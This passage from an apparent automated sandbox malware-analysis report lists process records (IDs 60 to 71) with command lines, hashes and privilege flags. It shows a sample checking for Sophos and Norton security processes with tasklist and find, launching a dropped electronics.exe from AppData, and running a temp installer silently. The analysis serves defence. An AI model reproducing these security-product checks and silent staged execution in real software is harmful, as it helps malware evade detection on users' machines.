                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                                            Start time:04:36:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                                            Start time:04:36:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                            Start time:04:36:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:04:36:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Panorado\electronics.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                                                                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                                                                            File size:943'784 bytes
                                                                                                                                                                                                                                            MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:04:36:55
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                                                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                                                            File size:18'610'385 bytes
                                                                                                                                                                                                                                            MD5 hash:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 18%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:04:36:57
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                                                                                                                                                                                                                                            Imagebase:0x2a0000
                                                                                                                                                                                                                                            File size:3'366'912 bytes
                                                                                                                                                                                                                                            MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                            Start time:04:37:02
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                                                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                                                            File size:18'610'385 bytes
                                                                                                                                                                                                                                            MD5 hash:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                            Start time:04:37:03
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
                                                                                                                                                                                                                                            Imagebase:0xef0000
                                                                                                                                                                                                                                            File size:3'366'912 bytes
                                                                                                                                                                                                                                            MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            No disassembly